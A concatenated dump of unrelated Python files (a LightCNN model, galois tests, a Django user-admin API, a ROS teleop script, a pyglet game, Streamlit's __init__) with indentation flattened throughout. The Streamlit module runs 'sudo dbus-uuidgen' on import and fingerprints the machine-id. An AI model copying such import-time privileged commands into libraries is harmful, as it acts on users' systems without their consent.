class network_29layers_v2_templet(nn.Module):
def __init__(self, in_channel, block, layers):
super(network_29layers_v2_templet, self).__init__()
self.conv1 = mfm(in_channel, 48, 5, 1, 2)
self.block1 = self._make_layer(block, layers[0], 48, 48)
self.group1 = group(48, 96, 3, 1, 1)
self.block2 = self._make_layer(block, layers[1], 96, 96)
self.group2 = group(96, 192, 3, 1, 1)
self.block3 = self._make_layer(block, layers[2], 192, 192)
self.group3 = group(192, 256, 3, 1, 1)
self.block4 = self._make_layer(block, layers[3], 256, 256)
self.group4 = group(256, 128, 3, 1, 1)
self.block5 = self._make_layer(block, layers[4], 128, 128)
self.group5 = group(128, 64, 3, 1, 1)
self.block6 = self._make_layer(block, layers[5], 64, 64)
self.group6 = group(64, 64, 3, 1, 1)
self.fc = nn.Linear(8*8*64, 256)
def _make_layer(self, block, num_blocks, in_channels, out_channels):
layers = []
for i in range(0, num_blocks):
layers.append(block(in_channels, out_channels))
return nn.Sequential(*layers)
def forward(self, x):
'''
x = self.conv1(x)
x = F.max_pool2d(x, 2) + F.avg_pool2d(x, 2)
x = self.block1(x)
x = self.group1(x)
x = F.max_pool2d(x, 2) + F.avg_pool2d(x, 2)
x = self.block2(x)
x = self.group2(x)
x = F.max_pool2d(x, 2) + F.avg_pool2d(x, 2)
x = self.block3(x)
x = self.group3(x)
x = self.block4(x)
x = self.group4(x)
x = F.max_pool2d(x, 2) + F.avg_pool2d(x, 2)
x = x.view(x.size(0), -1)
fc = self.fc(x)
x = F.dropout(fc, training=self.training)
'''
x = self.conv1(x)
x = F.max_pool2d(x, 2) + F.avg_pool2d(x, 2)
x = self.block1(x)
x = self.group1(x)
x = F.max_pool2d(x, 2) + F.avg_pool2d(x, 2)
x = self.block2(x)
x = self.group2(x)
x = F.max_pool2d(x, 2) + F.avg_pool2d(x, 2)
x = self.block3(x)
x = self.group3(x)
x = F.max_pool2d(x, 2) + F.avg_pool2d(x, 2)
x = self.block4(x)
x = self.group4(x)
x = F.max_pool2d(x, 2) + F.avg_pool2d(x, 2)
x = self.block5(x)
x = self.group5(x)
x = self.block6(x)
x = self.group6(x)
x = F.max_pool2d(x, 2) + F.avg_pool2d(x, 2)
x = x.view(x.size(0), -1)
fc = self.fc(x)
x = F.dropout(fc, training=self.training)
return x
def LightCNN_9Layers(**kwargs):
model = network_9layers(**kwargs)
return model
def LightCNN_29Layers(**kwargs):
model = network_29layers(resblock, [1, 2, 3, 4], **kwargs)
return model
def LightCNN_29Layers_v2(**kwargs):
model = network_29layers_v2(resblock, [1, 2, 3, 4], **kwargs)
return model
def LightCNN_9Layers_templet(in_channel, pretrained=False):
model = network_9layers_templet(in_channel)
return model
def LightCNN_29Layers_v2_templet(in_channel, pretrained=False):
model = network_29layers_v2_templet(in_channel, resblock, [1,2,3,4,5,6])
return model
if __name__ == "__main__":
model = LightCNN_29Layers_v2_templet(3)
print(model) |
py | 1a306781b92398cd07a55977d0c140895c09d105 | """
``street.py``
=============
Module for the weight of a street segment
"""
from __future__ import annotations
from protocols import Weightable
from random import choice
from functools import total_ordering
from typing import Optional, List, Any, Dict
#: Include the maximum speed among the possible
#: speeds assumed on that street segment
INCLUDE_MAX_SPEED = False
@total_ordering
class Street(Weightable):
"""
    Weight class (:class:`Weightable`) for a street segment
    As soon as the :attr:`~street.Street.speed` property is
    read for the first time, it takes on a value that is kept
    for the lifetime of the object.
    However, when this instance is copied with :func:`copy.deepcopy`,
    the property is reset and it may take on a new
    value.
    :param distance: segment distance
    :param max_speed: maximum speed on the segment
"""
def __init__(self, distance: float, max_speed: float):
self._distance = distance
self._max_speed = max_speed
self._latest_speeds: List[float] = []
self._speed: Optional[float] = None
def register_speeds(self, *speeds: float) -> None:
"""Registra as velocidades atuais no trecho"""
self._latest_speeds += list(speeds)
@property
def speed(self) -> float:
"""Velocidade assumida no trecho"""
if self._speed is None:
if INCLUDE_MAX_SPEED:
self._speed = choice(self._latest_speeds + [self._max_speed])
elif self._latest_speeds:
self._speed = choice(self._latest_speeds)
else:
self._speed = self._max_speed
return self._speed
@property
def distance(self) -> float:
"""distância do trecho"""
return self._distance
@property
def time(self) -> float:
"""tempo no trecho, com a velocidade assumida
Usado para a comparação entre trechos
"""
if self.speed:
return self.distance / self.speed
else:
return float('inf')
def is_inf(self) -> bool:
"""Se a velocidade assumida representa um tempo infinito"""
return not self.speed
def __eq__(self, other: Any) -> bool:
return isinstance(other, Street) and self.time == other.time
def __lt__(self, other: Any) -> bool:
return isinstance(other, Street) and self.time < other.time
def __add__(self, other: Street) -> Street:
"""A soma dos trechos equivale a soma dos tempos"""
d1, d2 = self.distance, other.distance
s1, s2 = self.speed, other.speed
distance = d1 + d2
if not s1 or not s2:
speed = 0.0
else:
speed = (distance * s1 * s2) / (d1 * s2 + d2 * s1)
return Street(distance, speed)
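    # Worked example (numbers chosen only for illustration): 2 km at 20 km/h plus
    # 3 km at 30 km/h takes 0.1 h + 0.1 h = 0.2 h, and the formula above gives
    # (5 * 20 * 30) / (2 * 30 + 3 * 20) = 25 km/h, i.e. 5 km / 0.2 h.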
def __repr__(self) -> str:
return repr(self.time)
def __deepcopy__(self, memo: Dict[int, Any]) -> Street:
"""Cópia especial que não mantém a velocidade assumida"""
new = Street(self.distance, self._max_speed)
new.register_speeds(*self._latest_speeds)
memo[id(self)] = new
return new
|
py | 1a3067addfccb44f5e88596ca682d20c01dcaa28 | """
A pytest module to test Galois field polynomial alternate constructors.
"""
import numpy as np
import pytest
import galois
FIELDS = [
galois.GF2, # GF(2)
galois.GF(31), # GF(p) with np.int dtypes
galois.GF(36893488147419103183), # GF(p) with object dtype
galois.GF(2**8), # GF(2^m) with np.int dtypes
galois.GF(2**100), # GF(2^m) with object dtype
galois.GF(7**3), # GF(p^m) with np.int dtypes
galois.GF(109987**4), # GF(p^m) with object dtypes
]
@pytest.mark.parametrize("field", FIELDS)
def test_zero(field):
p = galois.Poly.Zero(field)
assert isinstance(p, galois.Poly)
assert p.field is field
assert p.degree == 0
assert np.array_equal(p.nonzero_degrees, [])
assert np.array_equal(p.nonzero_coeffs, [])
assert np.array_equal(p.degrees, [0])
assert np.array_equal(p.coeffs, [0])
assert p.integer == 0
@pytest.mark.parametrize("field", FIELDS)
def test_one(field):
p = galois.Poly.One(field)
assert isinstance(p, galois.Poly)
assert p.field is field
assert p.degree == 0
assert np.array_equal(p.nonzero_degrees, [0])
assert np.array_equal(p.nonzero_coeffs, [1])
assert np.array_equal(p.degrees, [0])
assert np.array_equal(p.coeffs, [1])
assert p.integer == 1
@pytest.mark.parametrize("field", FIELDS)
def test_identity(field):
p = galois.Poly.Identity(field)
assert isinstance(p, galois.Poly)
assert p.field is field
assert p.degree == 1
assert np.array_equal(p.nonzero_degrees, [1])
assert np.array_equal(p.nonzero_coeffs, [1])
assert np.array_equal(p.degrees, [1,0])
assert np.array_equal(p.coeffs, [1,0])
assert p.integer == field.order
@pytest.mark.parametrize("field", FIELDS)
def test_random(field):
p = galois.Poly.Random(2, field=field)
assert isinstance(p, galois.Poly)
assert p.field is field
assert p.degree == 2
@pytest.mark.parametrize("field", FIELDS)
def test_integer(field):
integer = field.order + 1 # Corresponds to p(x) = x + 1
p = galois.Poly.Integer(integer, field=field)
assert isinstance(p, galois.Poly)
assert p.field is field
assert p.degree == 1
assert np.array_equal(p.nonzero_degrees, [1,0])
assert np.array_equal(p.nonzero_coeffs, [1,1])
assert np.array_equal(p.degrees, [1,0])
assert np.array_equal(p.coeffs, [1,1])
assert p.integer == integer
@pytest.mark.parametrize("field", FIELDS)
def test_degrees(field):
# Corresponds to p(x) = x^2 + 1
degrees = [2,0]
coeffs = [1,1]
p = galois.Poly.Degrees(degrees, coeffs, field=field)
assert isinstance(p, galois.Poly)
assert p.field is field
assert p.degree == 2
assert np.array_equal(p.nonzero_degrees, [2,0])
assert np.array_equal(p.nonzero_coeffs, [1,1])
assert np.array_equal(p.degrees, [2,1,0])
assert np.array_equal(p.coeffs, [1,0,1])
assert p.integer == field.order**2 + 1
@pytest.mark.parametrize("field", FIELDS)
def test_roots(field):
a, b = field.Random(), field.Random()
roots = [a, b] # p(x) = (x - a)*(x - b)
degree = 2
degrees = [2, 1, 0]
coeffs = [1, -a + -b, (-a)*(-b)]
nonzero_degrees = [d for d, c in zip(degrees, coeffs) if c > 0]
nonzero_coeffs = [c for d, c in zip(degrees, coeffs) if c > 0]
integer = sum([int(c)*field.order**d for d, c in zip(degrees, coeffs)])
p = galois.Poly.Roots(roots, field=field)
assert isinstance(p, galois.Poly)
assert p.field is field
assert p.degree == degree
assert np.array_equal(p.nonzero_degrees, nonzero_degrees)
assert np.array_equal(p.nonzero_coeffs, nonzero_coeffs)
assert np.array_equal(p.degrees, degrees)
assert np.array_equal(p.coeffs, coeffs)
assert p.integer == integer
@pytest.mark.parametrize("field", FIELDS)
def test_roots_with_multiplicity(field):
a = field.Random()
roots = [a] # p(x) = (x - a)*(x - a)
multiplicities = [2]
degree = 2
degrees = [2, 1, 0]
coeffs = [1, -a + -a, (-a)*(-a)]
nonzero_degrees = [d for d, c in zip(degrees, coeffs) if c > 0]
nonzero_coeffs = [c for d, c in zip(degrees, coeffs) if c > 0]
integer = sum([int(c)*field.order**d for d, c in zip(degrees, coeffs)])
p = galois.Poly.Roots(roots, multiplicities=multiplicities, field=field)
assert isinstance(p, galois.Poly)
assert p.field is field
assert p.degree == degree
assert np.array_equal(p.nonzero_degrees, nonzero_degrees)
assert np.array_equal(p.nonzero_coeffs, nonzero_coeffs)
assert np.array_equal(p.degrees, degrees)
assert np.array_equal(p.coeffs, coeffs)
assert p.integer == integer
|
py | 1a3067bc4e8a963488a35ed23b8bd57e5673563c | # Copyright (C) 2015-2022 by Vd.
# This file is part of Rocketgram, the modern Telegram bot framework.
# Rocketgram is released under the MIT License (see LICENSE).
from dataclasses import dataclass
from typing import Union, Optional, List
from .input_file import InputFile
from .message_entity import MessageEntity
from .parse_mode_type import ParseModeType
from .request import Request
from .utils import ALL_KEYBOARDS, MessageResultMixin
@dataclass(frozen=True)
class SendAudio(MessageResultMixin, Request):
"""\
Represents SendAudio request object:
https://core.telegram.org/bots/api#sendaudio
"""
chat_id: Union[int, str]
audio: Union[InputFile, str]
caption: Optional[str] = None
parse_mode: Optional[ParseModeType] = None
caption_entities: Optional[List[MessageEntity]] = None
duration: Optional[int] = None
performer: Optional[str] = None
title: Optional[str] = None
thumb: Optional[Union[InputFile, str]] = None
disable_notification: Optional[bool] = None
protect_content: Optional[bool] = None
reply_to_message_id: Optional[int] = None
allow_sending_without_reply: Optional[bool] = None
reply_markup: Optional[ALL_KEYBOARDS] = None
def files(self) -> List[InputFile]:
out = list()
if isinstance(self.audio, InputFile):
out.append(self.audio)
if isinstance(self.thumb, InputFile):
out.append(self.thumb)
return out
|
py | 1a3068a3585c91ebdc0587aa47980a1f82baca30 | import pyglet
from pyglet.window import key
from pyglet.window.key import MOD_SHIFT
from CGP import Individual, create_pop, evolve
from load import *
game_window = pyglet.window.Window(1600, 1000)
pyglet.resource.path = ['../assets']
pyglet.resource.reindex()
main_batch = pyglet.graphics.Batch()
pillar_batch = pyglet.graphics.Batch()
ai_batch = pyglet.graphics.Batch()
label_score = labels(batch=main_batch)
label_alive = labels(y=520, batch=main_batch)
label_best = labels(y=540, batch=main_batch)
label_generation = labels(y=560, batch=main_batch)
pillars = new_pillar(pillar_batch)
completion = False
score = 0
best_score = 0 # FIXME
time_count = 0
flag = 0
alive = 0
generation = 1
ai_num = ""
pop = None
birds_obj = []
ai_birds_obj = []
def create_ai_bird(pops):
global alive, ai_num
for ind in pops:
ai_birds_obj.append(new_ai_birds(individual=ind, batch=ai_batch))
alive += 1
ai_num = str(alive)
def clear_game():
global pillars, generation, score, time_count
for obj in pillars:
obj.delete()
pillars.remove(obj)
for obj in birds_obj:
obj.delete()
birds_obj.remove(obj)
generation += 1
score = 0
time_count = 0
pillars = new_pillar(pillar_batch)
def init():
global birds_obj, score
score = 0
label_score.text = "Score: " + str(score)
birds_obj.append(new_birds(main_batch))
def init_pop():
global ai_birds_obj, alive, ai_num, pop
pop = create_pop(10)
create_ai_bird(pop)
label_alive.text = "Alive: " + str(alive) + "/" + ai_num
label_generation.text = "Generation: " + str(generation)
label_best.text = "Best score: " + str(best_score)
@game_window.event
def on_draw():
global completion
game_window.clear()
main_batch.draw()
pillar_batch.draw()
ai_batch.draw()
for b in birds_obj:
game_window.push_handlers(b.get_key_handler())
@game_window.event
def on_key_press(symbol, modifiers):
# add a new player bird
if modifiers & MOD_SHIFT:
if symbol == key.N:
birds_obj.extend([new_birds(main_batch)])
# make it faster
if modifiers & MOD_SHIFT:
if symbol == key.EQUAL:
print("speed up")
pyglet.clock.schedule_interval(update, 1 / 120.0)
# make it stop
if modifiers & MOD_SHIFT:
if symbol == key.BACKSPACE:
print("stop")
pyglet.clock.unschedule(update)
def update(dt):
global completion, score, time_count, flag, alive, pop, best_score
time_count += 1
# update
for b in birds_obj:
b.update(dt)
# check collide
if b.collide_down(pillars[0]) or b.collide_up(pillars[1]):
b.dead = True
for p in pillars:
p.update(dt)
for b in ai_birds_obj:
if b.collide_down(pillars[0]) or b.collide_up(pillars[1]):
b.dead = True
b.update(dt)
# flap or not
b.check_flap(pillars[0].x, pillars[0].y)
# check pillars out of bounds
if pillars[0].check_bounds():
pillars[0].dead = True
pillars[1].dead = True
# remove dead objects
for to_remove in [obj for obj in pillars if obj.dead]:
to_remove.delete()
pillars.remove(to_remove)
for to_remove in [obj for obj in birds_obj if obj.dead]:
to_remove.delete()
birds_obj.remove(to_remove)
for to_remove in [obj for obj in ai_birds_obj if obj.dead]:
alive -= 1
to_remove.delete()
ai_birds_obj.remove(to_remove)
# add new pillars and reset flag for score
if time_count % 240 == 0:
time_count = 0
flag = 0
add_pillars = new_pillar(pillar_batch)
pillars.extend(add_pillars)
# label
# score
if flag == 0 and (len(birds_obj) > 0 or len(ai_birds_obj) > 0) and pillars[0].check_score():
# print(time_count)
flag += 1
score += 1
label_score.text = "Score: " + str(int(score))
# check alive AI
label_alive.text = "Alive: " + str(alive) + "/" + ai_num
# check best score
if score > best_score:
best_score = score
label_best.text = "Best score: " + str(best_score)
# check generation
label_generation.text = "Generation: " + str(generation)
# evolve AI
if alive == 0:
pop = evolve(pop, 0.03, 4, 6)
clear_game()
create_ai_bird(pop)
if __name__ == '__main__':
init()
init_pop()
# init_ai()
pyglet.clock.schedule_interval(update, 1 / 120.0)
pyglet.app.run()
|
py | 1a306966b719ef85a751c4fa1585f2a559fe9a4c | r"""
Remote (pmaf.remote)
====================
Exploit remote databases
------------------------
Classes
-------
.. autosummary::
:toctree: generated/
Entrez
"""
from ._entrez import Entrez
__all__ = ['Entrez'] |
py | 1a306a2a2dcf52f5e93c5095b38aed6e762c91ea | import rospy
from std_msgs.msg import Float64
import sys, select, termios, tty
msg = """
Move the Arm Links !!
---------------------------
Rotating (i), Picking(l) and Jaw Arm(o):
u i o
j k l
m , .
space key, k : force stop
anything else : stop smoothly
CTRL-C to quit
"""
moveBindings = {
'i':(1,0),
'o':(1,-1),
'j':(0,1),
'l':(0,-1),
'u':(1,1),
',':(-1,0),
'.':(-1,1),
'm':(-1,-1),
}
speedBindings={
'q':(1.1,1.1),
'z':(.9,.9),
'w':(1.1,1),
'x':(.9,1),
'e':(1,1.1),
'c':(1,.9),
}
def getKey():
tty.setraw(sys.stdin.fileno())
rlist, _, _ = select.select([sys.stdin], [], [], 0.1)
if rlist:
key = sys.stdin.read(1)
else:
key = ''
termios.tcsetattr(sys.stdin, termios.TCSADRAIN, settings)
return key
speed = 0.1
turn = 0.8
def vels(speed,turn):
return "currently:\tspeed %s\tturn %s " % (speed,turn)
if __name__=="__main__":
settings = termios.tcgetattr(sys.stdin)
rospy.init_node('arm_teleop')
pub_pick = rospy.Publisher('/robot_arm/picking_arm_controller/command', Float64, queue_size = 10) # Picking Arm controller
pub_rotate = rospy.Publisher('/robot_arm/rotating_arm_controller/command', Float64, queue_size = 10) # Rotating Arm controller
pub_jaw = rospy.Publisher('/robot_arm/jaw_arm_controller/command', Float64, queue_size = 10) # Jaw Arm controller
x = 1
th = 0
status = 0
count = 0
acc = 0.1
target_speed = 0
target_turn = 0
control_speed = 0
control_turn = 0
speed = 8
try:
print msg
print vels(speed,turn)
while(1):
key = getKey()
if key in moveBindings.keys():
x = moveBindings[key][0]
th = moveBindings[key][1]
count = 0
elif key in speedBindings.keys():
speed = speed * speedBindings[key][0]
turn = turn * speedBindings[key][1]
count = 0
print vels(speed,turn)
if (status == 14):
print msg
status = (status + 1) % 15
elif key == ' ' or key == 'k' :
x = 0
th = 0
control_speed = 0
control_turn = 0
else:
count = count + 1
if count > 10:
x = 0
th = 0
pass
if (key == '\x03'):
break
target_speed = speed * x
target_turn = turn * th
if target_speed > control_speed:
control_speed = min( target_speed, control_speed + 0.02 )
elif target_speed < control_speed:
control_speed = max( target_speed, control_speed - 0.02 )
else:
control_speed = target_speed
if target_turn > control_turn:
control_turn = min( target_turn, control_turn + 0.1 )
elif target_turn < control_turn:
control_turn = max( target_turn, control_turn - 0.1 )
else:
control_turn = target_turn
pub_pick.publish(control_turn) # Picking Arm speed
pub_rotate.publish(control_speed) # Rotating Arm speed
pub_jaw.publish(control_turn) # Jaw Arm speed
    except Exception as e:
        print e
finally:
pub_pick.publish(control_turn) # Picking Arm speed
pub_rotate.publish(control_speed) # Rotating Arm speed
pub_jaw.publish(control_turn) # Jaw Arm speed
termios.tcsetattr(sys.stdin, termios.TCSADRAIN, settings)
|
py | 1a306abb7ff91026b161aeec3c83ee5cd270bbb2 | import os
import argus
_example = argus.EXAMPLE_DRAG_CLOTH
python_path = os.path.dirname(os.path.realpath(__file__))
argus_interface = os.path.join(python_path, 'argus_interface.py')
os.system('python {} -e {}'.format(argus_interface, _example)) |
py | 1a306b2e32fa597fe500c61d1affcd6e636d84e9 | import os
import re
import xlsxwriter
from django.db import transaction, IntegrityError
from django.db.models import Q
from django.http import HttpResponse
from django.contrib.auth.hashers import make_password
from submission.models import Submission
from utils.api import APIView, validate_serializer
from utils.shortcuts import rand_str
from ..decorators import super_admin_required
from ..models import AdminType, ProblemPermission, User, UserProfile
from ..serializers import EditUserSerializer, UserAdminSerializer, GenerateUserSerializer
from ..serializers import ImportUserSeralizer
class UserAdminAPI(APIView):
@validate_serializer(ImportUserSeralizer)
@super_admin_required
def post(self, request):
"""
Import User
"""
data = request.data["users"]
user_list = []
for user_data in data:
if len(user_data) != 3 or len(user_data[0]) > 32:
return self.error(f"Error occurred while processing data '{user_data}'")
user_list.append(User(username=user_data[0], password=make_password(user_data[1]), email=user_data[2]))
try:
with transaction.atomic():
ret = User.objects.bulk_create(user_list)
UserProfile.objects.bulk_create([UserProfile(user=user) for user in ret])
return self.success()
except IntegrityError as e:
# Extract detail from exception message
# duplicate key value violates unique constraint "user_username_key"
# DETAIL: Key (username)=(root11) already exists.
return self.error(str(e).split("\n")[1])
@validate_serializer(EditUserSerializer)
@super_admin_required
def put(self, request):
"""
Edit user api
"""
data = request.data
if not data["sno"].isdigit():
return self.error("Student ID must be digital")
try:
user = User.objects.get(id=data["id"])
except User.DoesNotExist:
return self.error("User does not exist")
if User.objects.filter(username=data["username"].lower()).exclude(id=user.id).exists():
return self.error("Username already exists")
if User.objects.filter(email=data["email"].lower()).exclude(id=user.id).exists():
return self.error("Email already exists")
if User.objects.filter(sno=data["sno"]).exclude(id=user.id).exists():
return self.error("Student ID already exists")
pre_username = user.username
user.username = data["username"].lower()
user.sno = data["sno"]
user.email = data["email"].lower()
user.admin_type = data["admin_type"]
user.is_disabled = data["is_disabled"]
if data["admin_type"] == AdminType.ADMIN:
user.problem_permission = data["problem_permission"]
elif data["admin_type"] == AdminType.SUPER_ADMIN:
user.problem_permission = ProblemPermission.ALL
else:
user.problem_permission = ProblemPermission.NONE
if data["password"]:
user.set_password(data["password"])
if data["open_api"]:
# Avoid reset user appkey after saving changes
if not user.open_api:
user.open_api_appkey = rand_str()
else:
user.open_api_appkey = None
user.open_api = data["open_api"]
if data["two_factor_auth"]:
# Avoid reset user tfa_token after saving changes
if not user.two_factor_auth:
user.tfa_token = rand_str()
else:
user.tfa_token = None
user.two_factor_auth = data["two_factor_auth"]
user.save()
if pre_username != user.username:
Submission.objects.filter(username=pre_username).update(username=user.username)
UserProfile.objects.filter(user=user).update(real_name=data["real_name"])
return self.success(UserAdminSerializer(user).data)
@super_admin_required
def get(self, request):
"""
User list api / Get user by id
"""
user_id = request.GET.get("id")
if user_id:
try:
user = User.objects.get(id=user_id)
except User.DoesNotExist:
return self.error("User does not exist")
return self.success(UserAdminSerializer(user).data)
user = User.objects.all().order_by("-create_time")
keyword = request.GET.get("keyword", None)
if keyword:
user = user.filter(Q(username__icontains=keyword) |
Q(userprofile__real_name__icontains=keyword) |
Q(email__icontains=keyword))
return self.success(self.paginate_data(request, user, UserAdminSerializer))
@super_admin_required
def delete(self, request):
id = request.GET.get("id")
if not id:
return self.error("Invalid Parameter, id is required")
ids = id.split(",")
if str(request.user.id) in ids:
return self.error("Current user can not be deleted")
User.objects.filter(id__in=ids).delete()
return self.success()
class GenerateUserAPI(APIView):
@super_admin_required
def get(self, request):
"""
download users excel
"""
file_id = request.GET.get("file_id")
if not file_id:
return self.error("Invalid Parameter, file_id is required")
if not re.match(r"^[a-zA-Z0-9]+$", file_id):
return self.error("Illegal file_id")
file_path = f"/tmp/{file_id}.xlsx"
if not os.path.isfile(file_path):
return self.error("File does not exist")
with open(file_path, "rb") as f:
raw_data = f.read()
os.remove(file_path)
response = HttpResponse(raw_data)
response["Content-Disposition"] = f"attachment; filename=users.xlsx"
response["Content-Type"] = "application/xlsx"
return response
@validate_serializer(GenerateUserSerializer)
@super_admin_required
def post(self, request):
"""
Generate User
"""
data = request.data
number_max_length = max(len(str(data["number_from"])), len(str(data["number_to"])))
if number_max_length + len(data["prefix"]) + len(data["suffix"]) > 32:
return self.error("Username should not more than 32 characters")
if data["number_from"] > data["number_to"]:
return self.error("Start number must be lower than end number")
file_id = rand_str(8)
filename = f"/tmp/{file_id}.xlsx"
workbook = xlsxwriter.Workbook(filename)
worksheet = workbook.add_worksheet()
worksheet.set_column("A:B", 20)
worksheet.write("A1", "Username")
worksheet.write("B1", "Password")
i = 1
user_list = []
for number in range(data["number_from"], data["number_to"] + 1):
raw_password = rand_str(data["password_length"])
user = User(username=f"{data['prefix']}{number}{data['suffix']}", password=make_password(raw_password))
user.raw_password = raw_password
user_list.append(user)
try:
with transaction.atomic():
ret = User.objects.bulk_create(user_list)
UserProfile.objects.bulk_create([UserProfile(user=user) for user in ret])
for item in user_list:
worksheet.write_string(i, 0, item.username)
worksheet.write_string(i, 1, item.raw_password)
i += 1
workbook.close()
return self.success({"file_id": file_id})
except IntegrityError as e:
# Extract detail from exception message
# duplicate key value violates unique constraint "user_username_key"
# DETAIL: Key (username)=(root11) already exists.
return self.error(str(e).split("\n")[1])
|
py | 1a306d74c0958fc49aa211201e934089b0d6794d | # Copyright 2018-2020 Streamlit Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Streamlit.
How to use Streamlit in 3 seconds:
1. Write an app
>>> import streamlit as st
>>> st.write(anything_you_want)
2. Run your app
$ streamlit run my_script.py
3. Use your app
A new tab will open on your browser. That's your Streamlit app!
4. Modify your code, save it, and watch changes live on your browser.
Take a look at the other commands in this module to find out what else
Streamlit can do:
>>> dir(streamlit)
Or try running our "Hello World":
$ streamlit hello
For more detailed info, see https://docs.streamlit.io.
"""
# IMPORTANT: Prefix with an underscore anything that the user shouldn't see.
# NOTE: You'll see lots of "noqa: F821" in this file. That's because we
# manually mess with the local namespace so the linter can't know that some
# identifiers actually exist in the namespace.
# Must be at the top, to avoid circular dependency.
from streamlit import logger as _logger
from streamlit import config as _config
_LOGGER = _logger.get_logger("root")
# Give the package a version.
import pkg_resources as _pkg_resources
import uuid as _uuid
import subprocess
import platform
import os
from typing import Any, List, Tuple, Type
# This used to be pkg_resources.require('streamlit') but it would cause
# pex files to fail. See #394 for more details.
__version__ = _pkg_resources.get_distribution("streamlit").version
# Deterministic Unique Streamlit User ID
if (
platform.system() == "Linux"
and os.path.isfile("/etc/machine-id") == False
and os.path.isfile("/var/lib/dbus/machine-id") == False
):
print("Generate machine-id")
subprocess.run(["sudo", "dbus-uuidgen", "--ensure"])
machine_id = str(_uuid.getnode())
if os.path.isfile("/etc/machine-id"):
with open("/etc/machine-id", "r") as f:
machine_id = f.read()
elif os.path.isfile("/var/lib/dbus/machine-id"):
with open("/var/lib/dbus/machine-id", "r") as f:
machine_id = f.read()
__installation_id__ = str(_uuid.uuid5(_uuid.NAMESPACE_DNS, machine_id))
import contextlib as _contextlib
import re as _re
import sys as _sys
import textwrap as _textwrap
import threading as _threading
import traceback as _traceback
import types as _types
import json as _json
import numpy as _np
from streamlit import code_util as _code_util
from streamlit import env_util as _env_util
from streamlit import source_util as _source_util
from streamlit import string_util as _string_util
from streamlit import type_util as _type_util
from streamlit.DeltaGenerator import DeltaGenerator as _DeltaGenerator
from streamlit.ReportThread import add_report_ctx as _add_report_ctx
from streamlit.ReportThread import get_report_ctx as _get_report_ctx
from streamlit.errors import StreamlitAPIException
from streamlit.proto import BlockPath_pb2 as _BlockPath_pb2
from streamlit.util import functools_wraps as _functools_wraps
# Modules that the user should have access to. These are imported with "as"
# syntax pass mypy checking with implicit_reexport disabled.
from streamlit.caching import cache as cache # noqa: F401
# This is set to True inside cli._main_run(), and is False otherwise.
# If False, we should assume that DeltaGenerator functions are effectively
# no-ops, and adapt gracefully.
_is_running_with_streamlit = False
def _set_log_level():
_logger.set_log_level(_config.get_option("global.logLevel").upper())
_logger.init_tornado_logs()
# Make this file only depend on config option in an asynchronous manner. This
# avoids a race condition when another file (such as a test file) tries to pass
# in an alternative config.
_config.on_config_parsed(_set_log_level, True)
_main = _DeltaGenerator(container=_BlockPath_pb2.BlockPath.MAIN)
sidebar = _DeltaGenerator(container=_BlockPath_pb2.BlockPath.SIDEBAR)
# DeltaGenerator methods:
altair_chart = _main.altair_chart # noqa: E221
area_chart = _main.area_chart # noqa: E221
audio = _main.audio # noqa: E221
balloons = _main.balloons # noqa: E221
bar_chart = _main.bar_chart # noqa: E221
bokeh_chart = _main.bokeh_chart # noqa: E221
button = _main.button # noqa: E221
checkbox = _main.checkbox # noqa: E221
code = _main.code # noqa: E221
dataframe = _main.dataframe # noqa: E221
date_input = _main.date_input # noqa: E221
deck_gl_chart = _main.deck_gl_chart # noqa: E221
pydeck_chart = _main.pydeck_chart # noqa: E221
empty = _main.empty # noqa: E221
error = _main.error # noqa: E221
exception = _main.exception # noqa: E221
beta_set_favicon = _main.favicon # noqa: E221
file_uploader = _main.file_uploader # noqa: E221
graphviz_chart = _main.graphviz_chart # noqa: E221
header = _main.header # noqa: E221
help = _main.help # noqa: E221
image = _main.image # noqa: E221
info = _main.info # noqa: E221
json = _main.json # noqa: E221
latex = _main.latex # noqa: E221
line_chart = _main.line_chart # noqa: E221
map = _main.map # noqa: E221
markdown = _main.markdown # noqa: E221
multiselect = _main.multiselect # noqa: E221
number_input = _main.number_input # noqa: E221
plotly_chart = _main.plotly_chart # noqa: E221
progress = _main.progress # noqa: E221
pyplot = _main.pyplot # noqa: E221
radio = _main.radio # noqa: E221
selectbox = _main.selectbox # noqa: E221
slider = _main.slider # noqa: E221
subheader = _main.subheader # noqa: E221
success = _main.success # noqa: E221
table = _main.table # noqa: E221
text = _main.text # noqa: E221
text_area = _main.text_area # noqa: E221
text_input = _main.text_input # noqa: E221
time_input = _main.time_input # noqa: E221
title = _main.title # noqa: E221
vega_lite_chart = _main.vega_lite_chart # noqa: E221
video = _main.video # noqa: E221
warning = _main.warning # noqa: E221
beta_color_picker = _main.beta_color_picker # noqa: E221
# Config
get_option = _config.get_option
def set_option(key, value):
"""Set config option.
Currently, only two config options can be set within the script itself:
* client.caching
* client.displayEnabled
Calling with any other options will raise StreamlitAPIException.
Run `streamlit config show` in the terminal to see all available options.
Parameters
----------
key : str
The config option key of the form "section.optionName". To see all
available options, run `streamlit config show` on a terminal.
value
The new value to assign to this config option.
"""
opt = _config._config_options[key]
if opt.scriptable:
_config.set_option(key, value)
return
raise StreamlitAPIException(
"{key} cannot be set on the fly. Set as command line option, e.g. streamlit run script.py --{key}, or in config.toml instead.".format(
key=key
)
)
# Special methods:
_HELP_TYPES = (
_types.BuiltinFunctionType,
_types.BuiltinMethodType,
_types.FunctionType,
_types.MethodType,
_types.ModuleType,
) # type: Tuple[Type[Any], ...]
def write(*args, **kwargs):
"""Write arguments to the app.
This is the Swiss Army knife of Streamlit commands: it does different
things depending on what you throw at it. Unlike other Streamlit commands,
write() has some unique properties:
1. You can pass in multiple arguments, all of which will be written.
2. Its behavior depends on the input types as follows.
    3. It returns None, so its "slot" in the App cannot be reused.
Parameters
----------
*args : any
One or many objects to print to the App.
Arguments are handled as follows:
- write(string) : Prints the formatted Markdown string, with
support for LaTeX expression and emoji shortcodes.
See docs for st.markdown for more.
- write(data_frame) : Displays the DataFrame as a table.
- write(error) : Prints an exception specially.
- write(func) : Displays information about a function.
- write(module) : Displays information about the module.
- write(dict) : Displays dict in an interactive widget.
- write(obj) : The default is to print str(obj).
- write(mpl_fig) : Displays a Matplotlib figure.
- write(altair) : Displays an Altair chart.
- write(keras) : Displays a Keras model.
- write(graphviz) : Displays a Graphviz graph.
